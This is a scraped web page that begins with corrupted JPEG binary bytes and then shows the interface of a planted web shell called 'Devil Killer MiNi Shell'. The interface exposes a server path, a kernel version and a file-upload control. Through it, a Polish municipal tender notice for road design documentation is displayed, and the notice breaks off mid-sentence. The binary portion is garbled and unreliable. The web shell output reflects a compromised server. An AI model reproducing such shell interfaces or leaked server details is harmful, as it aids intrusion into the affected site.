JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/0023506201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowych na przebudowę z budową dróg gminnych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Czarna Białostocka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Torowa 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarna Białostocka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@czarnabialostocka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip-umczarnabialostocka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowych na przebudowę z budową dróg gminnych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-338cc9ee-479f-4fcc-ac39-1292a2b61a1f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00235062</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00023193/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Opracowanie dokumentacji projektowej drogi ul. Okrężna - ul. Ustronie w Czarnej Wsi Kościelnej</p> <p class="mb-0">1.3.8 Opracowanie dokumentacji projektowej drogi gminnej między ul. Torową i ul. Sienkiewicza w Czarnej Białostockiej</p> <p class="mb-0">1.3.9 Opracowanie dokumentacji projektowej drogi gminnej między ul. Sienkiewicza i ul. Prusa w Czarnej Białostockiej</p> <p class="mb-0">1.3.10 Opracowanie dokumentacji projektowej ul. Spokojnej w Czarnej Białostockiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-338cc9ee-479f-4fcc-ac39-1292a2b61a1f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz<br/>poczty elektronicznej przetargi@czarnabialostocka.pl . Adres strony internetowej, na której będą udostępniane zmiany i wyjaśnienia<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:<br/>https://bipum.czarnabialostocka.wrotapodlasia.pl w zakładce „Zamówienia publiczne&#34;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/ (dotyczy składania ofert), oraz pocz elektr: przetargi@czarnabialostocka.pl .<br/>2.Oferty/wnioski o dopuszczenie do udziału w postęp, zawiadomienia, wezwania, zadawanie pytań oraz ogólne informacje,Zamawiający i Wykonawcy przekazują powołując się nr ogłoszenia (BZP) lub nr refer postęp tj. Or.271.11.2025. 3.Wykonawca zamierzający wziąć udział w postęp o udzielenie zamów publicz, musi posiadać konto podmiotu „Wykonawca” na P.<br/>e-Zamówienia.Wykonawca posiadający konto na P. e-Zamówienia ma dostęp do formu: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komun. 4. Możliwość korzystania w postęp z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na P. e- Zamówienia oraz zalogowania się na P. e-Zamówienia. Do korzystania z „Formularza do komunikacji”służących do zadawania pytań dotyczących treści dokum zamów wystarczające jest posiadanie tzw. konta uproszczonego na P. e-Zamówieniach. Zamawiający wymaga aby komuni między zamawiającym a wykonawcami, w tym wszelkie oświad, wnioski, zawiadomienia oraz inform, przekazywane były w formie elektro. 5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z SWZ. 6. Wymagania techn i organizacyjne wysyłania i odbierania dokum elektron, elektron kopii dokum i oświadczeń oraz inform przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania<br/>z P. e-Zamówień. 7.Zamawiający przekazuje link do postęp oraz ID postępo jako inform do niniejszej SWZ. Dane postępow można wyszukać również ze strony głównej P. e-Zamówienia (przycisk „Przeglądaj postępowanie/konkurs”). 8. Za datę i godz przekazania oferty, wniosków, zawiadomień, dokum elektron, oświad lub elektron kopii dokum lub oświad oraz innych inform przyjmuje się datę ich przekazania na P. e-Zamówienia https://ezamowienia.gov.pl lub datę ich przekazania za pomocą pocz elektron z zastrzeżeniem, iż ofertę wraz z załącz określonymi w roz X. SWZ, pod rygorem odrzucenia oferty na podst art 226 ust.1 pkt6 Pzp, można przekazać wyłącznie na P. e-Zamówienia https://ezamowienia.gov.pl Dokum składane w formie elektron lub w postaci elektron muszą być opatrzone podp elektron, podp zaufanym lub podp osob (zgodnie z art. 63 ust. 2 Pzp). Ofertę, oświadczenia o których mowa w art.125 ust.1 Pzp., pśd, pełnomocnictwa sporządza się w postaci elektr, w ogólnie dostępnych formatach danych, w szczególności w formatach.txt,.rtf,.pdf,.doc,.docx,.odt. Zalecany przez Zamawiającego format danych - .pdf. 9. Komuni w postęp, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektro za pośrednictwem “Formularze”n(„Formularze do komunikacji”). Za pośred „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komun umożliwiają również dołączenie załącz do przesyłania wiadomoś (przycisk „dodaj załącznik”). W przypadku załącz zamawiający dopuszcza również możliwość składania doku elektr za pomocą poczty elektr, na wskazany w pkt. 1 adres e-mail. Sposób sporządzania dok elektr musi być zgodny z<br/>wymaganiami określonymi w rozp MRPiT z dn 23.12.2020 r. w sprawie pśd oraz innych dokum lub oświad, jakich może żądać zamawiający od wykonawcy oraz rozp PRM z dn 30.12.2020 r. w sprawie sposobu sporządz i przekazyw inform oraz wymagań tech dla dokum elektro oraz środ komu elektron w postęp o udzielenie zamó publi lub konkursie. W zależności od rodzaju podpisu i jego<br/>typu (zewn i wewn) dodaje się do przesłanej wiadomości uprzednio podpisane dokum wraz z wygenerowanym plikiem podp (typ zewn) lub dokum z wszytym podp (typ wewnętrzny). Wszystkie wysłane i odebrane w postępo przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 roz Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27.04.2016 r. w sprochrony osób fiz w związku z przetwarzaniem dan osob i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne roz. o ochronie da¬nych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Roz”, informuję, że:<br/>1.Admin Pani/Pana dan oso jest Gmina Cz B reprezentowana przez Burmistrza Cz B z siedzibą: ul. Torowa 14A, 16-020 Cz B,<br/>tel.:85 713 13 40, e-mail: um@czarnabialostocka.pl. 2.W sprawach z zakresu ochrony dan oso może się Pan/i kontaktować się z<br/>IOD pod adresem e-mail: iod@dbajodane.pl 3.Dane osobowe będą przetwarzane w celu związanym z postęp o udzielenie zp.<br/>4.Dane osob będą przechowywane przez okres zg. z art. 78 ust. 1 i 4 ust. z dnia z dnia 11.09.2019 r.– Pzp (Dz. U. z 2022 r. poz.<br/>1710 z późn. zm.)zwanej dalej PZP, przez okres 4 lat od dnia zak postępowania o udzielenie zam, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy. 5.Podstawą prawną przetwarzania danych jest<br/>art. 6 ust. 1 lit. c) ww. Roz w związku z przepisami PZP. 6.Odbiorcami Pan/i danych będą osoby lub podmioty, którym udostępniona zostanie dok postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP. 7.Ob podania przez Pan/i danych osobowych bezpośrednio<br/>Pan/i dotyczących jest wymogiem ust określonym w przepisach PZP, związanym z udziałem w post o udzielenie zam publ;<br/>konsekwencje niepodania określonych danych wynikają z PZP. 8.Osoba, której dane dotyczą ma prawo do: dostępu do treści swoich<br/>danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,w przypadku gdy przetw danych odbywa się z<br/>naruszeniem przep Roz służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa UODO, ul. Stawki 2, 00-193<br/>Wawa,9.Osobie, której dane dotyczą nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e Roz prawo do usunięcia dan osob;<br/>prawo do przenoszenia dan osob, o którym mowa w art. 20 Roz;na podstawie art. 21 Roz prawo sprzeciwu, wobec przetwarzania<br/>dan osob. 10.W przypadku gdy wykonanie obow, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego<br/>wysiłku, Admin może żądać od<br/>osoby, której dane dotyczą, wskazania dodat inf mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zam publ. 11.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia dan oso, o którym mowa w art. 16 Roz, nie może skutkować zmianą wyniku postę o udzielenie zam publ lub konkursu<br/>ani zmianą post. umowy w zakresie niezgodnym z PZP. 12.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Roz, nie<br/>ogranicza przetwarzania dan osobowych do czasu zakończenia postępowania o udzielenie zam publ. 13.W przypadku dan osob<br/>zamieszczonych przez Admin w BZP, prawa, o których mowa w art. 15 i art. 16 Roz, są wykonywane w drodze żądania<br/>skierowanego do Admin.14. Od dnia zakończenia postępowania o udzielenie zam, w przypadku gdy wniesienie żądania, o którym<br/>mowa w art. 18 ust. 1 Roz, spowoduje ograniczenie przetwarzania dan osob zawartych w protok i załą do protok, Admin nie<br/>udostępnia tych danych zawartych w protok i w zał do protok, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Roz.<br/>15.W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku,<br/>Admin może żądać od osoby, której dane dotyczą, wskazania dodatkowych inf mających w szczególności na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zam. 16.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do<br/>sprostowania lub uzup, o którym mowa w art. 16 Roz, nie może naruszać integralności protok oraz jego zał. 17.Ponadto<br/>informujemy, iż w związku z przetwarzaniem Pan/i danych osobowych nie podlega Pan/i decyzjom, które się opierają wyłącznie na<br/>zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozp</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.11.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1:	Opracowanie dokumentacji projektowej drogi ul. Okrężna - ul. Ustronie w Czarnej Wsi Kościelnej<br/>W ramach zadania należy opracować kompleksową, wielobranżową dokumentację projektową w zakresie rozwiązania drogowego, odwodnienia, oświetlenia ulicznego, usunięcia kolizji z istniejącym uzbrojeniem występującym na trasie inwestycji wraz z pełnieniem nadzoru autorskiego w czasie realizacji robót budowlanych. Długość projektowanych ulic: około 0,80 km. Początek odcinka – na wysokości drogi powiatowej nr 1420B ul. Pięknej w Czarnej Wsi Kościelnej (ul. Okrężna i ul. Ustronie), koniec odcinka – na wysokości dz. nr 7/2 ob. Czarna Wieś Kościelna. Obecnie droga posiada nawierzchnię gruntową/żwirową.<br/>W działkach przeznaczonych pod budowę znajdują się następujące urządzenia: kanalizacja sanitarna, sieć wodociągowa, linia energetyczna kablowa, sieć teletechniczna podziemna. Brak sieci kanalizacji deszczowej. Należy przewidzieć przebudowę urządzeń obcych w zakresie usunięcia kolizji z projektowanymi rozwiązaniami w przypadku ich występowania. Zakres przełożenia urządzeń obcych uzgodnić z Zamawiającym. Należy w miarę możliwości dążyć do zminimalizowania kosztów. Projekty branżowe należy uzgodnić z gestorami sieci. Zamawiający nie wyklucza występowania innej infrastruktury technicznej, niż wymieniona wyżej. W przypadku stwierdzenia występowania kolizji z innymi urządzeniami/infrastrukturą techniczną, Wykonawca dokumentacji projektowej zobowiązany jest do opracowania, w ramach niniejszego zamówienia, projektów wykonawczych branżowych w zakresie niezbędnym do opracowania kompletnego projektu budowlanego.<br/>Do obowiązku Wykonawcy dokumentacji projektowej należy uzyskanie warunków technicznych od gestorów sieci na usunięcie kolizji/zabezpieczenie istniejącej infrastruktury technicznej/urządzeń.<br/>Szerokość pasów drogowych w liniach rozgraniczających wynosi ok. 2,40 m – 6,50 m. Miejscami – z uwagi na brak wydzielonego pasa drogowego – zachodzi konieczność podziału gruntów przy uwzględnieniu minimalnej ilości miejsca potrzebnego do realizacji inwestycji<br/>Jednostka projektowa wykona we własnym zakresie mapę do celów projektowych, sporządzi dokumentację niezbędną do wydania decyzji na realizację inwestycji w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.) w tym przygotowanie wniosków do poszczególnych organów o wydanie opinii przewidzianych ustawą, pozwolenia wodnoprawnego i zezwolenia na wycinkę drzew. Wykonawca ma obowiązek przygotowania niezbędnej dokumentacji wymaganej prawem do opinii o które występuje zarządca drogi do innych organów.<br/>Na potrzeby budowy ulicy jednostka projektowa dokona podziałów geodezyjnych i sporządzi dokumentację geodezyjno - kartograficzną do wprowadzenia zmian w operacie ewidencji gruntów. Zamawiający przewiduje podział ok. 14 działek.<br/>Wykonawca sporządzi dokumentację na przebudowę lub budowę infrastruktury technicznej w przypadku wystąpienia kolizji z projektowaną drogą.<br/>Dokumentacja winna zawierać:<br/>1)	projekt budowlany – 4 egz. (2 egz. dla Zamawiającego),<br/>2)	projekt techniczny drogowy – 2 egz.,<br/>3)	projekt techniczny odwodnienia ulicy – 2 egz., <br/>4)	projekt techniczny przebudowy sieci wodociągowej – 2 egz. (o ile zajdzie taka konieczność),<br/>5)	projekt techniczny branży telekomunikacyjnej – 2 egz. (o ile zajdzie taka konieczność),<br/>6)	projekt techniczny branży elektrycznej – 2 egz.,<br/>7)	zatwierdzony projekt stałej organizacji ruchu – 3 egz.,<br/>8)	specyfikacje techniczne wykonania i odbioru robót - poszczególnych branż – po 2 egz.,<br/>9)	przedmiar robót dla poszczególnych branż – 1 egz.,<br/>10)	kosztorys inwestorski dla poszczególnych branż - 1 egz.,<br/>11)	badania geotechniczne - 2 egz. (w przypadku gruntów wątpliwych badania geotechniczne wykonać z częstotliwością umożliwiającą opracowanie przekroi geotechnicznych). Wiercenia powinny być tak lokalizowane, aby zweryfikować możliwość wystąpienia gruntów organicznych w obniżeniach terenowych. Na odcinkach występowania gruntów organicznych niezbędne jest ustalenie zasięgu przestrzennego tych warstw i granic występowania na mapie. W tym celu odległości między otworami należy lokalizować nie rzadziej jak 30-40 m.<br/>12)	operaty wodnoprawne wg aktualnie obowiązujących przepisów – 2 egz.,<br/>13)	plan wycinki drzew i krzewów z ewentualnym projektem zieleni – 2 egz.,<br/>14)	projekt kanału technologicznego – 2 egz. (w przypadku konieczności opracowania).<br/>W przypadku braku wolnych zasobów w istniejących kanalizacjach teletechnicznych, należy opracować projekt kanału technologicznego z częścią przedmiarowo-kosztorysową i ST lub uzyskać zgodę Ministra Cyfryzacji w formie decyzji administracyjnej, zwalniającej zarządcę drogi z obowiązku budowy kanału technologicznego w ramach realizacji przedmiotowej inwestycji.<br/>Jednostka projektowa zobowiązana jest do opracowania wielobranżowej kompleksowej dokumentacji projektowej w stadium projektu budowlano - wykonawczego wraz z dokumentacją geodezyjno-prawną, decyzjami oraz z wszystkimi uzgodnieniami i opiniami, warunkami, umożliwiającymi uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej (decyzja ZRID) w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2024 r. poz. 311 t. j.) oraz rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz. U. z 2022 r., poz. 1518), wraz z uzyskaniem wymaganych opinii do wniosku, jego przygotowaniem ze stosownymi dokumentami oraz uzyskaniem ostatecznej decyzji na realizację inwestycji drogowej.<br/>Ww. dokumentację projektową należy również stworzyć w 1 egz. w wersji elektronicznej w plikach PDF i ath (w tym kosztorysy i przedmiary robót) zapisanej na nośniku CD lub USB pendrive.<br/>Parametry projektowanych ulic:<br/>Ulica Okrężna (dł. ok. 0,27 km): jezdnia z kostki brukowej szarej o szerokości 5,00 m, utwardzenie pozostałej części pasa drogowego między jezdnią a przyległymi nieruchomościami i ogrodzeniami wykonać z kostki brukowej betonowej szarej. Zjazdy z kostki brukowej betonowej czerwonej.<br/>Ulica Ustronie (dł. ok 0,53 km): jezdnia z kostki brukowej szarej o szerokości zmiennej maksymalnie 5,00 m, na wysokości dz. nr 20/5, 58/1, 58/2, 58/3 i 58/6 zaprojektować jako drogę jednokierunkową, miejscowo zawężoną do ok. 2,5 m, utwardzenie pozostałej części pasa drogowego między jezdnią a przyległymi nieruchomościami i ogrodzeniami wykonać z kostki brukowej betonowej szarej. Zjazdy z kostki brukowej betonowej czerwonej. W przypadku braku możliwości zaprojektowania drogi o wskazanych parametrach z ramach procedury ZRID, Zamawiający dopuszcza możliwość pozbawienia fragmentu ulicy Ustronie kategorii drogi publicznej i zaprojektowanie utwardzenia wydzielonego w ten sposób fragmentu drogi w procedurze uzyskania pozwolenia na budowę.<br/>Szerokość projektowanych zjazdów do nieruchomości zabudowanych dostosować do istniejących bram wjazdowych. W pozostałych przypadkach – zaprojektować zjazdy normatywne.<br/>Odwodnienie ciągów komunikacyjnych i terenów przyległych wg propozycji jednostki projektowej uzgodnionej z Zamawiającym – np. w postaci częściowej kanalizacji deszczowej z odprowadzeniem do drogi powiatowej nr 1420B ul. Pięknej, na pozostałym zakresie jako powierzchniowy spływ na pobocza. Zaprojektowany system powinien zapewnić skuteczny sposób odwodnienia pasa drogowego.<br/>W ulicach zaprojektować linię energetyczną oświetleniową kablową.<br/>Zamawiający upoważni Wykonawcę do występowania w jego imieniu do innych organów o uzyskanie niezbędnych opinii i uzgodnień.<br/>Zakres zamówienia obejmuje również pełnienie funkcji nadzoru autorskiego w trakcie realizacji robót budowlanych oraz koszt aktualizacji kosztorysów inwestorskich, na życzenie Zamawiającego, co 6 miesięcy w okresie 3 lat od daty wykonania przedmiotu zamówienia.<br/>Szczegółowe rozwiązania, dotyczące m.in. urządzeń bezpieczeństwa ruchu (wyniesione skrzyżowania, progi zwalniające itp.), zostaną ustalone pomiędzy Zamawiającym i Wykonawcą na etapie projektowania. Wykonawca przedłoży również koncepcję przebudowy do zatwierdzenia przez Zamawiającego w terminie 6 tygodni od podpisania 